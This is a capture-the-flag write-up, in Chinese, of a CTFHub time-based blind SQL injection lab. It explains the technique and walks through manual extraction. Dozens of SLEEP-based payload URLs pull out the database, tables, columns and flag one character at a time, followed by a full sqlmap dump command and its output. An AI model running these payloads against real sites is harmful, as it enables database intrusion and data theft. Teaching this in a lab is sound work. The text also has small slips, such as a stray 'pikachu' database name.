CTFHub SQL注入通关笔记5:时间盲注(手注法+脚本法)
目录
一、时间盲注
二、SQL注入探测
1、打开靶场
2、输入1探测SQL注入类型
3、探测注入方法
4、探测是否有SQL注入风险
三、SQL手工注入
1、探测数据库名
2、探测表名
3、探测列名
4、探测数据
四、sqlmap脚本法
本文详细介绍了CTFHub平台的SQL时间盲注关卡渗透过程。首先通过输入测试字符确认存在数值型SQL注入,由于页面无反馈信息,采用时间盲注技术,利用SLEEP函数配合IF条件语句判断数据库信息。手工注入阶段逐步获取数据库名(sqli)、表名(news和flag)、列名(flag)及最终flag值。同时展示了使用sqlmap工具自动完成渗透的方法,通过--techT参数指定时间盲注技术,成功获取相同结果。整个渗透过程展示了时间盲注的技术特点和执行流程。
一、时间盲注
时间盲注是一种高级SQL注入技术,当应用程序存在SQL注入但既不显示查询结果也不返回明显的错误信息时使用。攻击者通过向数据库注入包含时间延迟函数(如SLEEP()、BENCHMARK()等)的恶意查询,根据页面响应时间的差异来判断注入条件是否成立。如果注入条件为真,数据库执行延迟函数,页面响应时间明显延长;如果条件为假,则立即返回,响应时间正常。这种技术不依赖任何可见的内容输出或错误信息,完全通过测量响应时间来实现数据提取,虽然攻击速度较慢但极具隐蔽性,能够绕过大多数传统安全防护机制。布尔盲注与时间盲注的区别如下表所示。
| 特性 | 布尔盲注 | 时间盲注 |
|---|---|---|
| 检测依据 | 页面内容差异 | 响应时间差异 |
| 核心函数 | 条件判断函数 | 延迟函数 |
| 典型payload | AND 1=1 / AND 1=2 | AND SLEEP(5) |
| 判断方式 | 查看页面显示内容 | 计算响应时间 |
| 攻击速度 | 相对较快 | 相对较慢 |
| 隐蔽性 | 较低(有请求痕迹) | 较高(类似正常请求) |
| 适用场景 | 页面内容随条件变化 | 页面无任何变化但存在注入 |
| 技术难度 | 简单 | 较复 |
二、SQL注入探测
1、打开靶场
打开关卡( “SQL注入 - 时间盲注”)点击打开题目,如下所示,此时系统自动创建Docker环境,下图蓝色部分的URL地址就是靶场环境。
浏览器输入靶场URL链接,这就是我们的攻击目标,访问URL后页面内容明确写明"SQL时间注入",具体如下所示。
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/
2、输入1探测SQL注入类型
根据提示在页面输入1,此时URL的参数变为/?id=1,猜测id就是注入点。
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/?id=1关注下图中的SQL注入语句,如下所示参数1被传入后未被引号包裹,确实是数值型注入。但是查询成功并未显示具体内容,也未告知查询成功,由于页面没有显示查询结果的具体输出,没有暴漏数据库任何信息,故而无法使用联合注入法进行渗透。
select * from news where id=1
3、探测注入方法
输入1',由于本关卡为数值型注入,试图通过引入特殊字符触发错误,若页面返回详细的数据库错误信息则证明存在SQL注入风险且未屏蔽错误。如下所示页面没有数据库报错信息,除了SQL语句外,页面同样没有任何输出,无法使用报错法注入。
再次输入不存在的id(-1)观察页面是否输出,如下所示页面中除了SQL语句外,页面同样没有任何输出。由于无论查询成功还是失败,页面都没有输出,故而需要使用时间注入法。
4、探测是否有SQL注入风险
使用1 AND IF(LENGTH(DATABASE()) >0, SLEEP(2), 1)进行渗透,判断数据库的长度是否大于0,这是一个恒真的语句,如下所示。其核心原理是利用IF条件函数和SLEEP函数进行时间延迟判断:当数据库名长度大于0时,执行SLEEP(2)产生2秒延迟;否则立即返回1。
1 AND IF(LENGTH(DATABASE()) >0, SLEEP(2), 1)#mooyuan右键-查看元素-网络,在文本框内输入Payload,然后点击search,如下所示。
攻击者通过观察页面响应时间来判断条件真假——如果有明显延迟说明数据库名确实长度大于0。这种方法不依赖页面内容显示,而是通过响应时间差异来推断数据库信息。点击此报文,然后点击右下角的耗时,如下所示响应时间超过2000ms(2秒),说明sleep语句执行成功,该if条件成功,说明具有SQL时间型注入风险。
三、SQL手工注入
1、探测数据库名
如下所示,数据库名的长度为4,名字为sqli,手工注入渗透成功的完整Payload如下所示。
[+] 第一步:探测数据库名
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH(DATABASE()) = 4, SLEEP(2), 1)#mooyuan
数据库名长度:4
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 1, 1) = 's', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 2, 1) = 'q', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 3, 1) = 'l', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING(DATABASE(), 4, 1) = 'i', SLEEP(2), 1)#mooyuan
数据库名:sqli
2、探测表名
如下所示,pikachu数据库共有2个表格,分别为news,flag,手工注入渗透成功的完整Payload如下所示。
[+] 第二步:探测表信息
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF((SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli') = 2, SLEEP(2), 1)#mooyuan
表数量:2
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1)) = 4, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 1, 1) = 'n', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 2, 1) = 'e', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 3, 1) = 'w', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 0,1), 4, 1) = 's', SLEEP(2), 1)#mooyuan
表 1: news
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1)) = 4, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 1, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 2, 1) = 'l', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 3, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli' LIMIT 1,1), 4, 1) = 'g', SLEEP(2), 1)#mooyuan
表 2: flag
3、探测列名
如下所示,flag表共有1列,列名为flag,手工注入渗透成功的完整Payload如下所示。
[+] 第三步:探测表 flag 的列
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF((SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag') = 1, SLEEP(2), 1)#mooyuan
列数量:1
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1)) = 4, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 1, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 2, 1) = 'l', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 3, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqli' AND TABLE_NAME='flag' LIMIT 0,1), 4, 1) = 'g', SLEEP(2), 1)#mooyuan
列 1: flag
4、探测数据
接下来探测flag表的第一行数据,值为成功获取到flag值ctfhub{349a5528e5e9f96d31f93a56},具体如下所示。
[+] 从表 flag 提取数据[*] 第 1 行数据:
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(LENGTH((SELECT flag FROM flag LIMIT 0,1)) = 32, SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 1, 1) = 'c', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 2, 1) = 't', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 3, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 4, 1) = 'h', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 5, 1) = 'u', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 6, 1) = 'b', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 7, 1) = '{', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 8, 1) = '3', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 9, 1) = '4', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 10, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 11, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 12, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 13, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 14, 1) = '2', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 15, 1) = '8', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 16, 1) = 'e', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 17, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 18, 1) = 'e', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 19, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 20, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 21, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 22, 1) = '6', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 23, 1) = 'd', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 24, 1) = '3', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 25, 1) = '1', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 26, 1) = 'f', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 27, 1) = '9', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 28, 1) = '3', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 29, 1) = 'a', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 30, 1) = '5', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 31, 1) = '6', SLEEP(2), 1)#mooyuan
http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800//?id=1 AND IF(SUBSTRING((SELECT flag FROM flag LIMIT 0,1), 32, 1) = '}', SLEEP(2), 1)#mooyuanflag: ctfhuB{349a5528e5e9f96d31f93a56}
四、sqlmap脚本法
我们使用sqlmap来进行渗透,参数的含义是获取当前数据库名称(--current-db)并导出所有数据(--dump),全程自动执行无需人工交互(--batch),完整的SQL注入命令如下所示。
sqlmap -u http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/?id=1 --current-db --dump --batch --tech T-
--current-db:这是一个信息枚举参数。它的作用是命令SQLMap在成功找到注入点后,首先获取当前正在使用的数据库名称。这是后续操作的关键第一步,因为知道了数据库名,才能进一步查询它里面的表。 -
--dump-
这是一个数据提取参数,是这条命令的“终极目标”。它的作用是命令SQLMap尽最大努力提取并下载所有它能访问的数据。
-
--dump的行为非常激进和自动化,它通常包含以下子步骤:-
枚举当前数据库的所有表名。
-
针对每个表,枚举其所有列名。
-
然后将其每个表中的所有数据内容(每一行每一列)全部提取并保存到本地。
-
-
--batch:以非交互模式运行,自动选择默认选项,无需人工干预--tech T:指定 SQL 注入测试技术为时间盲注(Time-based blind SQL injection)。这种技术通过构造包含延时函数的 SQL 语句,根据页面响应时间的差异来判断注入是否成功,适用于无法通过页面内容直接判断注入结果的场景
如下所示,sqlmap渗透成功,成功获取到flag值ctfhub{349a5528e5e9f96d31f93a56}。由于打印信息过多,这里我只将关键信息进行展示。
┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://challenge-f283d7e9d400a865.sandbox.ctfhub.com:10800/?id=1 --current-db --dump --batch --tech T _____H__ ___ ___[']_____ ___ ___ {1.6#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 10:44:43 /2025-09-14/[10:44:43] [INFO] resuming back-end DBMS 'mysql'
[10:44:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1 AND (SELECT 3536 FROM (SELECT(SLEEP(5)))LwKS)
---
[10:44:43] [INFO] the back-end DBMS is MySQL
web application technology: OpenResty 1.21.4.2, PHP 7.3.14
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:44:43] [INFO] fetching current database
[10:44:43] [INFO] resumed: sqli
current database: 'sqli'
[10:44:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[10:44:43] [INFO] fetching current database
[10:44:43] [INFO] fetching tables for database: 'sqli'
[10:44:43] [INFO] fetching number of tables for database 'sqli'
[10:44:43] [INFO] resumed: 2
[10:44:43] [INFO] resumed: news
[10:44:43] [INFO] resumed: flag
[10:44:43] [INFO] fetching columns for table 'news' in database 'sqli'
[10:44:43] [INFO] resumed: 2
[10:44:43] [INFO] resumed: id
[10:44:43] [INFO] resumed: data
[10:44:43] [INFO] fetching entries for table 'news' in database 'sqli'
[10:44:43] [INFO] fetching number of entries for table 'news' in database 'sqli'
[10:44:43] [INFO] resumed: 3
[10:44:43] [INFO] resumed: ctfhub
[10:44:43] [INFO] resumed: 1
[10:44:43] [INFO] resumed: skill
[10:44:43] [INFO] resumed: 2
[10:44:43] [INFO] resumed: sqli
[10:44:43] [INFO] resumed: 114514
Database: sqli
Table: news
[3 entries]
+--------+--------+
| id | data |
+--------+--------+
| 1 | ctfhub |
| 2 | skill |
| 114514 | sqli |
+--------+--------+[10:44:43] [INFO] table 'sqli.news' dumped to CSV file '/home/kali/.local/share/sqlmap/output/challenge-f283d7e9d400a865.sandbox.ctfhub.com/dump/sqli/news.csv'
[10:44:43] [INFO] fetching columns for table 'flag' in database 'sqli'
[10:44:43] [INFO] resumed: 1
[10:44:43] [INFO] resumed: flag
[10:44:43] [INFO] fetching entries for table 'flag' in database 'sqli'
[10:44:43] [INFO] fetching number of entries for table 'flag' in database 'sqli'
[10:44:43] [INFO] resumed: 1
[10:44:43] [INFO] resumed: ctfhub{349a5528e5e9f96d31f93a56}
Database: sqli
Table: flag
[1 entry]
+----------------------------------+
| flag |
+----------------------------------+
| ctfhub{349a5528e5e9f96d31f93a56} |
+----------------------------------+[10:44:43] [INFO] table 'sqli.flag' dumped to CSV file '/home/kali/.local/share/sqlmap/output/challenge-f283d7e9d400a865.sandbox.ctfhub.com/dump/sqli/flag.csv'
[10:44:43] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/challenge-f283d7e9d400a865.sandbox.ctfhub.com'
[10:44:43] [WARNING] your sqlmap version is outdated[*] ending @ 10:44:43 /2025-09-14/